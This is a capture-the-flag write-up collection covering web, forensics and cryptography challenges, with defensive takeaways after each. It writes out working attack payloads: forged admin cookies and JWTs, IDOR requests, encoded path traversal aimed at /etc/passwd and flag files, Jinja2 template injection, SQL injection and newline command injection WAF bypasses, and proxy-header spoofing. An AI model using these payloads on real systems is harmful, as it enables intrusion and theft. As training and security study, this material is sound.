Challenge Index
The following 24 challenges were solved during the 24-hour competition window, listed in the order they were addressed during the event.
- ROT-13 Decryptor — Cryptography (Easy, 20 pts)
- Cookie Auth — Web (Medium, 300 pts)
- Staff Dashboard — Web (Medium, 350 pts)
- Hidden ZIP in PNG — Forensics (Medium, 300 pts)
- DocViewer — Web (Medium, 350 pts)
- Card Studio — Web (Medium, 350 pts)
- UserHub — Web (Medium, 350 pts)
- Suspicious Transmission — Steganography (Medium, 300 pts)
- JWT Weak Secret — Web (Medium, 300 pts)
- SQL Injection Login Bypass — Web (Medium, 300 pts)
- API Gateway — Web (Medium, 350 pts)
- ProfileHub — Web (Hard, 500 pts)
- JS Vault — Web (Easy, 100 pts)
- Source Dive — Web (Easy, 100 pts)
- Disallowed Path — Web (Easy, 100 pts)
- The Encoding Onion — Other (Medium, 300 pts)
- Redirect Maze — Web (Easy, 100 pts)
- Ping Tool — Web (Medium, 300 pts)
- Two Point Three Six Part 2 — OSINT (Easy, 50 pts)
- shinchi — Mobile (Medium, 250 pts)
- Cipher Room — Cryptography (Easy, 100 pts)
- RSA Common Factor — Cryptography (Medium, 300 pts)
- XOR Known Plaintext — Cryptography (Medium, 300 pts)
- Signing Oracle — Cryptography (Hard, 500 pts)
Web Exploitation
Cookie Auth — Web (Medium, 300 pts)
Overview
We were given a guest account and a sample session cookie. The challenge hint embedded in the page revealed the exact structure of the authentication mechanism — including how the signature was computed. That made this a targeted brute-force and forgery exercise rather than a black-box attack.
Cookie Structure
The hint disclosed the format:
Cookie: base64(json({"username": "...", "role": "...", "sig": "..."}))
Signature: MD5(secret + username + role)
The signature used a prepended secret — a naive hash construction that offers none of the guarantees of a real HMAC and is vulnerable to length-extension attacks. Since we had a valid guest signature, we knew the output of MD5(secret + 'guest' + 'guest'). The task was to brute-force the secret.
Brute-Forcing the Secret
We iterated common passwords against the known guest signature. The correct secret was supersecretkey.
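A minimal sketch of the brute-force loop, assuming a small inline wordlist (the real run used a common-passwords list, and the known signature came from the server's cookie):

```python
import hashlib

# Known-good signature observed for the guest account. Recomputed here so the
# demo is self-contained; in the real attack this value came from the cookie.
KNOWN_SIG = hashlib.md5(b'supersecretkey' + b'guest' + b'guest').hexdigest()

# Stand-in for a common-passwords wordlist such as rockyou.txt.
wordlist = ['password', 'admin123', 'letmein', 'supersecretkey']

found = None
for candidate in wordlist:
    # Recompute MD5(secret + username + role) for each candidate secret.
    sig = hashlib.md5((candidate + 'guest' + 'guest').encode()).hexdigest()
    if sig == KNOWN_SIG:
        found = candidate
        break

print('Recovered secret:', found)
```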
Forging the Admin Token
With the secret in hand, we wrote a script to generate a forged admin token:
import hashlib, json, base64
SECRET = 'supersecretkey'
username, role = 'admin', 'admin'
sig = hashlib.md5((SECRET + username + role).encode()).hexdigest()
payload = json.dumps({'username': username, 'role': role, 'sig': sig})
token = base64.b64encode(payload.encode()).decode()
print('Set cookie: session_token =', token)
We set the forged token in the browser cookie, refreshed the page, and accessed /admin to retrieve the flag.
Key Takeaways
- MD5(secret + data) is not a secure HMAC construction — use HMAC-SHA256 properly
- Disclosing the signature algorithm in a client-visible hint reduces this to a brute-force problem
- Custom cookie-based auth should use established libraries, not hand-rolled crypto
- Once a secret is known, any number of valid tokens can be forged for arbitrary roles
Staff Dashboard — Web (Medium, 350 pts)
Overview
This challenge dropped us into an internal staff dashboard where each team member had their own profile, private notes, and workspace. We were handed guest credentials and told the admin had properly isolated user data. Classic challenge setup — in other words, it hadn't.
Initial Foothold
First move was to log in as the guest user and observe how the application established identity:
curl -siL -X POST http://chall-e1c23987.evt-246.glabs.ctf7.com/login \
  -d "username=guest&password=guest123" \
  -c /tmp/idor_cookies.txt -b /tmp/idor_cookies.txt
After logging in, the server set a session cookie. We immediately threw that value into a Base64 decoder:
Cookie value: eyJ1c2VyX2lkIjogMX0=
Decoded: {"user_id": 1}
No signature. No HMAC. Just a plain JSON object encoded in Base64, sitting in the browser cookie jar like it belonged there. That told us everything we needed to know.
IDOR Discovery
Poking around the dashboard HTML, we spotted that profile data was fetched from a numeric API endpoint:
GET /api/user/1
We called it directly using our guest session to confirm it returned our own profile. Then we incremented the ID by one:
curl -si http://chall-e1c23987.evt-246.glabs.ctf7.com/api/user/2 \
  -H "Cookie: session_token=eyJ1c2VyX2lkIjogMX0="
The server handed back the admin's full profile — no authorization check, no ownership validation. Pure IDOR. The application verified that a user was logged in, but never verified whether that user was allowed to access the requested resource.
Session Forgery (Alternative Path)
Since the session cookie was unsigned Base64, we could also impersonate the admin by forging it directly:
# Forge admin cookie
echo -n '{"user_id": 2}' | base64
# Result: eyJ1c2VyX2lkIjogMn0=
curl -si http://chall-e1c23987.evt-246.glabs.ctf7.com/dashboard \
  -H "Cookie: session_token=eyJ1c2VyX2lkIjogMn0="
This loaded the admin dashboard directly. Either path — direct IDOR on the API or forged session cookie — led to the same outcome. The flag was sitting in the admin's notes field.
Key Takeaways
- IDOR flaws arise when authorization is never checked server-side — authentication alone is not enough
- Base64 is encoding, not encryption — never use it to protect sensitive session data
- Client-side identity claims must always be validated and cryptographically signed
- Numeric sequential IDs in API endpoints are a red flag for IDOR during recon
Hidden ZIP in PNG — Forensics (Medium, 300 pts)
Overview
A PNG image that rendered as a normal gradient picture. The challenge description mentioned that there might be more past the end of the image. That's a classic forensics hint for polyglot files — specifically, data appended after the PNG's IEND chunk.
Enumeration
We started with exiftool for metadata extraction:
exiftool challenge.png
Key findings:
Comment: password=ctf72026
Warning: Trailer data after PNG IEND chunk
The file had two immediate giveaways: a password embedded in the image comment field, and a warning about extra data appended after the valid PNG structure. That extra data was the target.
Extraction
We ran binwalk to identify and extract the embedded archive:
binwalk -e challenge.png
Output:
21236    0x52F4    Zip archive data, encrypted, name: flag.txt
21409 0x53A1 End of Zip archive
binwalk extracted the ZIP file. We then decrypted it using the password found in the image metadata:
unzip hidden.zip
Enter password: ctf72026
The archive contained flag.txt, which held the flag.
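The trailer check can also be done by hand. A sketch that slices off whatever follows the IEND chunk (toy bytes below, not the real challenge file):

```python
PNG_SIG = b'\x89PNG\r\n\x1a\n'

def trailing_data(data: bytes) -> bytes:
    # The IEND chunk is the 4-byte type plus a 4-byte CRC; anything after
    # that is trailer data a strict PNG parser would never read.
    end = data.find(b'IEND') + 4 + 4
    return data[end:]

# Toy file: PNG signature, a dummy chunk, the IEND chunk, then a ZIP header.
fake_png = (PNG_SIG
            + b'\x00' * 8
            + b'\x00\x00\x00\x00IEND\xaeB`\x82'
            + b'PK\x03\x04 ...zip bytes...')
print(trailing_data(fake_png))
```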
Key Takeaways
- PNG IEND warnings are a strong indicator of appended data — always run binwalk on suspicious images
- Metadata fields like comments, author, and GPS data are frequently used to hide clues in forensics challenges
- Polyglot files (valid as two formats simultaneously) are a common forensics technique
- exiftool + binwalk is the standard first-pass forensics toolkit for image challenges
DocViewer — Web (Medium, 350 pts)
Overview
An internal documentation portal with a file viewer for accessing guides, API references, and deployment files. The application claimed to restrict file access to a designated documentation directory. Our job was to test whether that restriction held up under scrutiny.
Analysis
File viewers that accept user-controlled paths are a classic path traversal target. The application's claim of directory restriction implied some filtering was in place — but filtering without proper path normalization is rarely airtight. The key question was: does the app validate the path before or after resolving it?
Testing & Exploitation
We began with basic directory traversal sequences to probe the filter:
../
../../
../../../etc/passwd
../../../../flag.txt
Some of these were blocked outright. We then introduced URL-encoded variants, since many filters check raw input but decode it before the actual file access:
%2e%2e%2f%2e%2e%2fflag.txt (URL encoded)
%252e%252e%252f%252e%252e%252fflag.txt (Double encoded)
The encoded traversal sequences slipped through the filter. Once the server decoded the path, it resolved to a valid traversal outside the documentation directory. By testing incrementally deeper paths, we located and retrieved the flag file.
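The encoded variants are easy to generate programmatically. A sketch (the helper name is ours, not from the challenge):

```python
def encode_traversal(path: str, times: int = 1) -> str:
    # Percent-encode the traversal sequences, then re-encode the '%' signs
    # once per extra round to produce double- (or triple-) encoded variants.
    out = path.replace('../', '%2e%2e%2f')
    for _ in range(times - 1):
        out = out.replace('%', '%25')
    return out

print(encode_traversal('../../flag.txt'))     # %2e%2e%2f%2e%2e%2fflag.txt
print(encode_traversal('../../flag.txt', 2))  # %252e%252e%252f%252e%252e%252fflag.txt
```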
Key Takeaways
- Path filters must operate on normalized, decoded paths — not raw input strings
- Double encoding exploits servers that decode input twice before processing
- Whitelist-based path validation (e.g. canonical path checks) is safer than blacklisting traversal patterns
- Always test URL-encoded and double-encoded variants when a direct traversal is blocked
Card Studio — Web (Medium, 350 pts)
Overview
A digital greeting card generator that let users input a recipient name and message, then rendered a card preview. The challenge description boasted about its 'powerful template engine' — which, as it turned out, was a hint rather than a feature.
Identifying the Vulnerability
Any time a challenge mentions a template engine rendering user input, Server-Side Template Injection (SSTI) goes straight to the top of the test list. We tried the classic canary payload in the 'To' field:
{{7*7}}
The generated card preview displayed:
Dear 49,
The expression was evaluated server-side. The output syntax was a textbook Jinja2 response, confirming we were looking at a Flask application with an unescaped render_template_string call.
Exploitation
Rather than going straight for RCE, we first checked what context objects were accessible within the template. In Flask, config is a globally accessible object that exposes the application's configuration dictionary:
{{config}}
The server's response contained the full app configuration — and the flag was stored directly inside it. No command execution needed.
Why the Code Was Vulnerable
The vulnerable pattern in Flask looks like this:
# VULNERABLE
template = f"Dear {name},\n{message}"
return render_template_string(template)
# SAFE
return render_template_string(
    "Dear {{ name }},\n{{ message }}",
    name=name, message=message)
When user input is interpolated directly into the template string, Jinja2 treats it as executable template code. Passing it as a context variable instead renders it as inert data.
Key Takeaways
- Never pass raw user input into render_template_string() — use context variables
- SSTI in Jinja2 often doesn't require RCE — sensitive config data is frequently accessible directly
- Template engine error messages and math evaluation outputs are key SSTI indicators
- {{config}} is one of the fastest ways to extract secrets in a Flask SSTI scenario
UserHub — Web (Medium, 350 pts)
Overview
A user profile page with basic update functionality. The goal was to escalate privileges to admin. The description hinted at a flaw in how the backend handled incoming data — which pointed directly toward Mass Assignment.
Recon
We opened browser DevTools and watched the network traffic while updating the profile name. The update triggered a POST request to /api/profile carrying a minimal JSON body:
{"name": "user"}
The endpoint only sent a name field — but that didn't mean the backend only accepted a name field.
Exploitation
Mass assignment vulnerabilities exist when a backend framework binds incoming request data directly to model objects without filtering which fields are allowed. We tested whether the server would accept additional fields by injecting a role parameter directly from the browser console:
fetch('/api/profile', {
  method: 'PUT',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ "name": "user", "role": "admin" })
})
The server accepted the payload without complaint, responded with a success message, and our account was now flagged as admin. Accessing the admin panel returned the flag.
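The server-side fix is an explicit field allowlist (a DTO, in framework terms). A minimal Python sketch, with the field names assumed for illustration:

```python
ALLOWED_FIELDS = {'name', 'email'}  # assumed set of legitimately updatable fields

def safe_update(model: dict, incoming: dict) -> dict:
    # Bind only allowlisted keys and silently drop everything else,
    # so an injected "role" field never reaches the model.
    model.update({k: v for k, v in incoming.items() if k in ALLOWED_FIELDS})
    return model

user = {'name': 'user', 'role': 'user'}
safe_update(user, {'name': 'eve', 'role': 'admin'})
print(user)  # role stays 'user' despite the injected field
```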
Key Takeaways
- Mass assignment occurs when backends bind user-controlled JSON fields directly to internal models
- Always use DTOs or explicit field allowlists to restrict which parameters can be bound
- Switching HTTP methods (POST to PUT) sometimes triggers different — and less restricted — code paths
- Checking adjacent fields in a JSON API body is a fast way to probe for privilege escalation
API Gateway — Web (Medium, 350 pts)
Overview
An API gateway using a reverse proxy architecture where nginx handled role assignments before requests reached the backend. The documentation stated that user roles were set exclusively by the proxy — and there was no way to tamper with them from outside. That claim deserved testing.
Recon
The interactive API documentation exposed three endpoints:
POST /api/login → Returns JWT on authentication
GET /api/profile → Requires valid Bearer token
GET /api/admin/flag → Restricted (not documented, found via recon)
We focused on the admin endpoint. The challenge description mentioned that nginx injected role headers — which immediately raised the question: can we inject those headers ourselves?
Exploitation
Reverse proxies commonly communicate backend role information through headers like X-Forwarded-Role, X-User-Role, or X-Forwarded-User. If the backend blindly trusted these without verifying they came from the proxy, we could supply them directly:
curl http://chall-708fcc09.evt-246.glabs.ctf7.com/api/admin/flag \
  -H "X-Forwarded-Role: admin"
The server responded with a success message and the flag — no authentication token required. The backend was trusting a header that any client could set, rather than enforcing that the header originated from the internal proxy.
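The usual fix is to overwrite the header at the proxy so client-supplied values can never reach the backend. A minimal nginx sketch (the location path and upstream name are assumptions, not from the challenge):

```nginx
location /api/ {
    # Setting the header at the proxy overwrites anything the client sent;
    # an empty value removes the header entirely.
    proxy_set_header X-Forwarded-Role "";
    proxy_pass http://backend_upstream;
}
```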
Key Takeaways
- Internal proxy headers like X-Forwarded-Role must never be trusted from external clients
- Backends should only accept trusted headers from known internal IP ranges or after stripping them at the gateway
- Undocumented endpoints can often be guessed from naming patterns (/admin, /internal, /debug)
- This is a real-world misconfiguration pattern seen in production architectures
ProfileHub — Web (Hard, 500 pts)
Overview
ProfileHub v2.4.1 implemented client-side input validation through a WebAssembly (WASM) module, claiming that it ensured no malicious input could reach the backend. The objective was to access the restricted admin panel despite these defenses.
Analysis
The first thing we established was that all validation logic ran on the client side — meaning it existed in our browser, under our control. WASM adds a layer of obfuscation compared to plain JavaScript, but it changes nothing about the fundamental security model: if validation only runs client-side, it can be bypassed.
Bypass Strategy
Instead of trying to reverse the WASM module, we took the more direct route. Using browser DevTools (Network tab), we monitored the requests being sent after the WASM validation passed. The plan was to let the WASM sanitize the input, then intercept and modify the outgoing HTTP request before it left the browser.
By intercepting the request in the Network tab and manually editing the payload — injecting role-based fields or privilege markers that the WASM would have stripped — we bypassed the validation layer entirely. The backend, which trusted that the client had done its job, accepted the modified request without question.
This granted us admin privileges and access to the panel containing the flag.
Key Takeaways
- Client-side validation is a UX feature, not a security control — it can always be bypassed
- WebAssembly does not make client-side logic secure; it only makes it harder to read
- All trust decisions must be enforced server-side, independent of what the client sends
- Browser DevTools network interception is often faster than reversing a WASM binary
SQL Injection Login Bypass — Web (Medium, 300 pts)
Overview
A login page protected by a Web Application Firewall that aggressively filtered SQL injection payloads. The challenge was less about the injection itself and more about finding a bypass that didn't need the characters the WAF was watching for.
WAF Fingerprinting
Standard SQLi payloads were met with 403 Forbidden responses. The WAF appeared to be blocking:
admin' OR 1=1# → 403 Forbidden
admin'/**/OR/**/1=1# → 403 Forbidden
admin' AND 1=1-- → 403 Forbidden
URL-encoded variants → 403 Forbidden
SQL keywords (OR, AND, UNION, SELECT), comment syntax (#, --, /**/), and most standard comparison operators were all blocked or filtered.
The Bypass
The key insight was that SQL string comparisons don't need a comment to terminate the query — if the WHERE clause is structured as a string comparison, we can close both halves naturally without appending anything after:
username = admin' or '1'='1
password = anything
This payload evaluates to a WHERE clause like WHERE username='admin' or '1'='1' AND password='anything', where the always-true string comparison bypasses authentication. Crucially, no comment syntax is required because the surrounding quotes are balanced, so the WAF had nothing obvious to block. The login succeeded and the flag was returned.
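The balanced-quote payload can be verified against an in-memory SQLite database (the schema and credentials below are illustrative):

```python
import sqlite3

db = sqlite3.connect(':memory:')
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 'r3al_s3cret')")

# Vulnerable string-built query, mirroring the challenge's login check.
username = "admin' or '1'='1"
password = "anything"
query = ("SELECT * FROM users WHERE username='" + username
         + "' AND password='" + password + "'")
rows = db.execute(query).fetchall()
print(rows)  # the admin row comes back without knowing the password
```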
Key Takeaways
- WAF evasion often comes down to restructuring payloads rather than encoding them
- String-based SQL injection can bypass comment-blocking WAFs by avoiding comments entirely
- Balanced quote payloads are a cleaner evasion technique against keyword-focused filters
- Always test variations of a known working payload when initial attempts are blocked
JWT Weak Secret — Web (Medium, 300 pts)
Overview
A login endpoint that issued JWTs upon authentication. The token was used to authorize requests, and the challenge involved cracking the weak signing secret and forging an admin token.
Extracting the Token
We logged in via a POST request to obtain the initial JWT:
curl -X POST http://<target>/login \
  -d 'username=guest&password=guest123'
The response returned a JWT in the standard three-part format (header.payload.signature).
Cracking the Secret
JWTs signed with HMAC algorithms (HS256) are only as secure as the secret key. We ran the token through hashcat with a common password wordlist:
hashcat -a 0 -m 16500 <jwt_token> wordlist.txt
Hashcat cracked the secret almost immediately: secret123. A short, dictionary-guessable key completely undermines JWT security regardless of the algorithm used.
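The same dictionary attack can be reproduced without hashcat in a few lines of stdlib Python. A sketch that builds a demo HS256 token locally (standing in for the server's token) and then recovers the secret:

```python
import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()

def hs256_sig(signing_input: str, secret: str) -> str:
    return b64url(hmac.new(secret.encode(), signing_input.encode(),
                           hashlib.sha256).digest())

# Demo token signed with the weak secret (stand-in for the server's token).
header = b64url(json.dumps({'alg': 'HS256', 'typ': 'JWT'}).encode())
payload = b64url(json.dumps({'username': 'guest', 'role': 'guest'}).encode())
token = header + '.' + payload + '.' + hs256_sig(header + '.' + payload, 'secret123')

# Dictionary attack: recompute the signature under each candidate secret.
cracked = None
signing_input, _, sig = token.rpartition('.')
for candidate in ['password', 'admin', 'hunter2', 'secret123']:
    if hmac.compare_digest(hs256_sig(signing_input, candidate), sig):
        cracked = candidate
        break
print('Cracked secret:', cracked)
```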
Forging the Admin Token
With the secret known, we headed to jwt.io, decoded the token, changed the role claim to admin and the username to admin, re-signed it using the cracked secret, and sent the forged token in the Authorization header:
curl -X GET http://<target>/admin \
  -H 'Authorization: Bearer <forged_admin_jwt>'
The server accepted the forged token and returned the flag.
Key Takeaways
- JWT secrets must be long, random, and stored securely — dictionary words are trivially crackable
- hashcat with mode 16500 is specifically designed for JWT cracking
- Once the signing secret is known, any JWT claim can be forged without detection
- Consider asymmetric algorithms (RS256, ES256) to eliminate shared-secret risks entirely
Source Dive — Web (Easy, 100 pts)
Overview
A polished marketing site for a fictional cloud platform — NexusCloud. The challenge description hinted that the engineering team 'shipped a little more than intended.' In practice, that meant developer artifacts left in production.
Approach & Solve
We started with the most common source-code exposure pattern: the JavaScript source map. Production bundles often retain a reference to their source map file at the bottom of the minified bundle:
# Check the JS bundle
http://chall-bec76e05.evt-246.glabs.ctf7.com/static/app.bundle.js
# Last line of the bundle:
//# sourceMappingURL=app.bundle.js.map
Following that reference, we fetched the .map file directly:
http://chall-bec76e05.evt-246.glabs.ctf7.com/static/app.bundle.js.map
Source maps contain the original, unminified source code — comments, variable names, and all. Searching through it, we found the flag embedded in the source.
Key Takeaways
- Source maps should never be deployed to production environments — they expose the original codebase
- Browser DevTools → Sources panel reveals sourceMappingURL comments automatically
- Frontend asset auditing is a fast and often overlooked recon step
JS Vault — Web (Easy, 100 pts)
Overview
A vault page that accepted a passcode. The real content was protected — or so it appeared. The protection was a JavaScript file full of obfuscated code that we could read directly in the browser's Network tab.
Solving It
Opening the Network tab while loading the page revealed vault.js being fetched. The obfuscated logic was easy to read once you understood the pattern:
window._vaultData = _0x3fa1;
function _0x3fa1() {
  var _0xc = _0x4a7b.concat(_0x8f2c).concat(_0x1d9e);
  return _0xc.map(function(_0xe) {
    return String.fromCharCode(_0xe);
  }).join('');
}
The function concatenated three numeric arrays and converted each number to its ASCII character equivalent. We extracted the three arrays from the source:
_0x4a7b = [99,116,102,55,123,106,115,95,115,101]
_0x8f2c = [99,114,101,116,95,101,120,112,111,115]
_0x1d9e = [101,100,95,54,56,54,50,99,48,48,102,125]
Converting each number to its ASCII character and joining them produced the flag directly. No vault cracking needed — the flag was stored in the JavaScript the whole time.
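Reproducing the decode offline takes only a few lines of Python:

```python
# The three arrays lifted from vault.js.
_0x4a7b = [99, 116, 102, 55, 123, 106, 115, 95, 115, 101]
_0x8f2c = [99, 114, 101, 116, 95, 101, 120, 112, 111, 115]
_0x1d9e = [101, 100, 95, 54, 56, 54, 50, 99, 48, 48, 102, 125]

# Concatenate and map each code point to its ASCII character.
flag = ''.join(chr(n) for n in _0x4a7b + _0x8f2c + _0x1d9e)
print(flag)
```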
Key Takeaways
- Client-side JavaScript obfuscation is not a security layer — the code runs in the user's browser
- ASCII-to-character array patterns are among the most common obfuscation techniques
- Browser DevTools → Sources is your first stop for any client-side protection
Disallowed Path — Web (Easy, 100 pts)
Overview
A file access system that explicitly blocked direct requests to sensitive paths like /flag.txt. The challenge name was a nudge — the path was disallowed, but only if you asked for it the obvious way.
Approach
Direct traversal payloads using ../ were caught by the filter. The application was clearly checking for known-bad patterns in the raw input string. However, the check happened on the raw string — not on the decoded or normalized version. This is the classic mistake that makes encoding-based bypasses work.
Direct attempt: ../../../flag.txt → Blocked
URL encoded: %2e%2e%2f%2e%2e%2fflag.txt → Bypassed
Double encoded: %252e%252e%252f… → Also tested
The URL-encoded payload slipped past the filter. The server decoded %2e → . and %2f → / after validation, turning the payload into a valid traversal path on the filesystem. The flag file was retrieved from outside the restricted directory.
Key Takeaways
- Filters must normalize and decode input before validation — checking raw strings is insufficient
- %2e%2e%2f is the URL-encoded form of ../ and bypasses many naive path filters
- Double encoding (%252e) exploits systems that decode input twice in a pipeline
- Canonical path resolution (realpath + prefix check) is the correct server-side fix
Redirect Maze — Web (Easy, 100 pts)
Overview
Warpgate appeared to be a normal redirect demo. The final landing page showed nothing of interest — because the flag was never on the final page. It was distributed across a chain of intermediate HTTP 302 responses, piece by piece, in a custom header that browsers silently discard when following redirects.
Analysis
The homepage contained a single link pointing to /maze/1. Requesting it with a standard browser followed all the redirects automatically and landed on /maze/finish — which showed nothing useful. The key was to disable redirect following and inspect each intermediate response individually.
We traced the redirect chain manually, extracting the X-Flag-Part header from each hop:
HOP 1 /maze/1 X-Flag-Part: 1:[FLAG REDACTED]
HOP 6 /maze/finish 200 OK (no flag here)
Solve Script
We wrote a Python script to automate the chain traversal and reconstruct the flag:
import requests
from urllib.parse import urljoin
base = 'http://chall-a9b6107d.evt-246.glabs.ctf7.com/'
url = urljoin(base, '/maze/1')
parts = {}
for _ in range(20):
    resp = requests.get(url, allow_redirects=False, timeout=15)
    part = resp.headers.get('X-Flag-Part')
    if part:
        idx, val = part.split(':', 1)
        parts[int(idx)] = val
    if resp.is_redirect:
        url = urljoin(url, resp.headers['Location'])
    else:
        break
print(''.join(parts[k] for k in sorted(parts)))
Key Takeaways
- Intermediate HTTP redirect responses are full HTTP responses with their own headers — inspect them
- curl -v or requests with allow_redirects=False are essential for redirect chain analysis
- Browsers hide redirect metadata from users by design — manual tooling is needed
Ping Tool — Web (Medium, 300 pts)
Overview
A web-based ping utility. The server executed OS-level ping commands based on user-provided IP addresses. A WAF was in place to filter obvious injection characters. The challenge was to find a separator the WAF missed.
WAF Fingerprinting
Standard command injection separators were all blocked:
ip=8.8.8.8;id → WAF blocked
ip=8.8.8.8|id → WAF blocked
ip=8.8.8.8&&id → WAF blocked
Normal pings worked fine — the WAF wasn't killing the whole functionality, just watching for the obvious separators. That meant the underlying shell execution was still happening.
The Bypass — Newline Injection
In Unix shells, a newline character (\n) is a valid command separator — just like a semicolon. The WAF was filtering visible characters but not URL-encoded control characters. We sent %0a (URL-encoded newline) as the separator:
curl -s -X POST $URL/ping -d "ip=8.8.8.8%0aid"
The response included the output of both the ping and the id command. The process was running as root (uid=0) — a serious misconfiguration on top of the injection itself. From there, we located and read the flag:
# Locate the flag
ip=8.8.8.8%0afind / -name "flag*"
# Read it
ip=8.8.8.8%0acat /flag.txt
Key Takeaways
- URL-encoded newlines (%0a) are a common WAF bypass for command injection — filter \n, not just ;|&&
- Running a web-facing tool as root is a critical misconfiguration that magnifies any injection flaw
- Command injection WAFs should block at the execution layer too (restricted shell, subprocess without shell=True)
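The newline-separator behavior is easy to reproduce locally: inside a shell=True command string, \n separates commands just like ';'. A sketch in which 'echo' stands in for the real ping binary and the injected command is a harmless echo:

```python
import subprocess
from urllib.parse import unquote

user_input = '8.8.8.8%0aecho INJECTED'   # attacker-controlled form value
decoded = unquote(user_input)            # becomes '8.8.8.8\necho INJECTED'

# Vulnerable pattern: user input interpolated into a shell command string.
cmd = 'echo ping ' + decoded
out = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
print(out)  # both the "ping" line and the injected command's output appear
```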
Cryptography
ROT-13 Decryptor — Cryptography (Easy, 20 pts)
Overview
This was a warmup cryptography challenge — exactly the kind you want to crack open early on to get the scoreboard moving. A garbled transmission was provided with the hint that a simple shift cipher was used. The ciphertext prefix pgs7 was the dead giveaway.
Approach
ROT13 is a Caesar cipher locked at a shift of 13. We noticed the prefix pgs7 in the ciphertext — rotating each letter forward by 13 positions gives ctf7, instantly confirming ROT13 as the cipher in use. The rest of the decode followed trivially: we applied ROT13 to the full ciphertext.
Ciphertext:
pgs7{Guvf_vf_ubyr_cebbs}
Decoding the text within the braces:
G → T u → h v → i f → s (Guvf → This)
v → i f → s (vf → is)
u → h b → o y → l r → e (ubyr → hole)
c → p e → r b → o b → o (cebbs → proof)
The decoded message reads: This_is_hole_proof — a clear confirmation of successful decryption. The flag was obtained directly from the decoded output.
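Python's codecs module ships a rot_13 codec, so the whole solve is a single call:

```python
import codecs

ciphertext = 'pgs7{Guvf_vf_ubyr_cebbs}'
print(codecs.decode(ciphertext, 'rot_13'))  # ctf7{This_is_hole_proof}
```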
Key Takeaways
- ROT13 is its own inverse — encoding and decoding use the same operation
- Recognizing the mangled ctf7 prefix as pgs7 is the fastest way to identify the cipher
- ROT13 appears frequently in easy CTF warmups as an encoding layer inside harder challenges too
Cipher Room — Cryptography (Easy, 100 pts)
Overview
A ciphertext that appeared to use a Caesar cipher — but the obvious shift didn't produce meaningful output. The actual shift value was hidden in the HTML source of the challenge page.
Initial Attempt
Looking at the ciphertext prefix tkw7, we expected it to decode to ctf7, which suggested a decryption shift of +9. Our first attempt applied a -9 shift — the wrong direction — and produced output that looked shifted but not meaningful, confirming the wrong shift was used.
Finding the Correct Shift
The challenge description hinted that 'encryption parameters are hidden in the page metadata.' Inspecting the page HTML source revealed:
<meta name="cipher-shift" content="17">
Decrypting with a shift of -17 produced readable output with leet-speak substitutions (1 → i, 3 → e). The decrypted phrase translated to 'hidden in cipher', confirming the correct key.
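A small shift helper confirms the parameters; digits pass through unchanged, which is consistent with the leet-speak characters surviving in the output:

```python
def caesar_shift(text: str, shift: int) -> str:
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord('a') if ch.islower() else ord('A')
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)  # digits and punctuation are left untouched
    return ''.join(out)

# The prefix check: shifting 'tkw7' back by 17 yields 'ctf7'.
print(caesar_shift('tkw7', -17))  # ctf7
```

Note that -17 and +9 are the same shift mod 26, which is why the prefix analysis pointed at the right answer all along.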
Key Takeaways
- Always check HTML source and meta tags for hints — challenge authors often embed parameters there
- When a Caesar cipher produces a 'close but wrong' result, try all 25 possible shifts systematically
- Leet-speak substitutions (1→i, 3→e) are frequently used in CTF flag strings to add an encoding layer
XOR Known Plaintext — Cryptography (Medium, 300 pts)
Overview
A service that encrypted arbitrary hex-encoded plaintexts using a 'military-grade XOR encryption' — a repeating-key XOR cipher. The target ciphertext was provided upfront. The vulnerability: keystream reuse.
Analysis
XOR with a repeating key is only secure if the key is never reused across different messages. Since the service would encrypt any input we provided using the same underlying key, we could extract the full keystream by encrypting a known plaintext of null bytes. XOR logic dictates:
Plaintext XOR Keystream = Ciphertext
0x00 XOR Keystream = Keystream ← encrypting null bytes dumps the key
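The null-byte trick is easy to demonstrate locally. A sketch using the 5-byte key observed in the challenge output and a toy plaintext of our own (not the real flag):

```python
KEY = bytes.fromhex('3bf5ca72f1')  # repeating key recovered from the oracle

def xor_with_key(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Encrypting null bytes returns the keystream itself, since 0 ^ k == k.
keystream = xor_with_key(b'\x00' * 32, KEY)
assert keystream == (KEY * 7)[:32]

# XOR the recovered keystream against a ciphertext to get the plaintext back.
ct = xor_with_key(b'flag{example_not_the_real_flag!}', KEY)
print(bytes(c ^ k for c, k in zip(ct, keystream)).decode())
```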
Extraction & Decryption
The target ciphertext was 32 bytes (64 hex characters). We sent 64 null hex characters to the ENCRYPT command:
ENCRYPT 0000000000000000000000000000000000000000000000000000000000000000
Response: 3bf5ca72f13bf5ca72f13bf5ca72f13bf5ca72f13bf5ca72f13bf5ca72f13bf5
The keystream repeated every 5 bytes (3bf5ca72f1), confirming a short repeating key. We XOR'd the extracted keystream against the target ciphertext:
ct = bytes.fromhex(ciphertext_hex)
key = bytes.fromhex(keystream_hex)
pt = bytes(c ^ k for c, k in zip(ct, key))
print(pt.decode())
The flag was recovered from the decrypted plaintext.
Key Takeaways
- Repeating-key XOR is trivially broken when the service encrypts chosen plaintexts
- Encrypting null bytes reveals the raw keystream — a direct consequence of 0 XOR K = K
- Short repeating keys leave visible patterns in the encrypted keystream output
- Key reuse across messages is the fundamental flaw in stream cipher implementations
RSA Common Factor — Cryptography (Medium, 300 pts)
Overview
We were given two RSA public keys (n1 and n2) and a ciphertext encrypted under n1. The challenge name was as direct as they come — the two moduli shared a prime factor, which makes factoring both of them trivial through a GCD computation.
The Vulnerability
RSA security relies on the difficulty of factoring n = p × q when p and q are generated independently and randomly. If two different moduli share a prime (due to a broken or seeded RNG), computing gcd(n1, n2) instantly reveals that shared prime. From there, each modulus factors completely.
Exploit Script
import math

n1 = 0xef0c2d8d582ef706...  # (truncated for brevity)
n2 = 0x298df6897e2a69d5...  # (truncated for brevity)
e1 = 65537
ciphertext = 0x9c63d01dd818...

# Step 1: Find the shared prime via GCD
p = math.gcd(n1, n2)
if p > 1:
    print('[+] Shared prime found!')
    q1 = n1 // p                    # Factor n1
    phi_n1 = (p - 1) * (q1 - 1)     # Euler's totient
    d1 = pow(e1, -1, phi_n1)        # Private key (Python 3.8+)
    m = pow(ciphertext, d1, n1)     # Decrypt
    print(m.to_bytes((m.bit_length() + 7) // 8, 'big').decode())
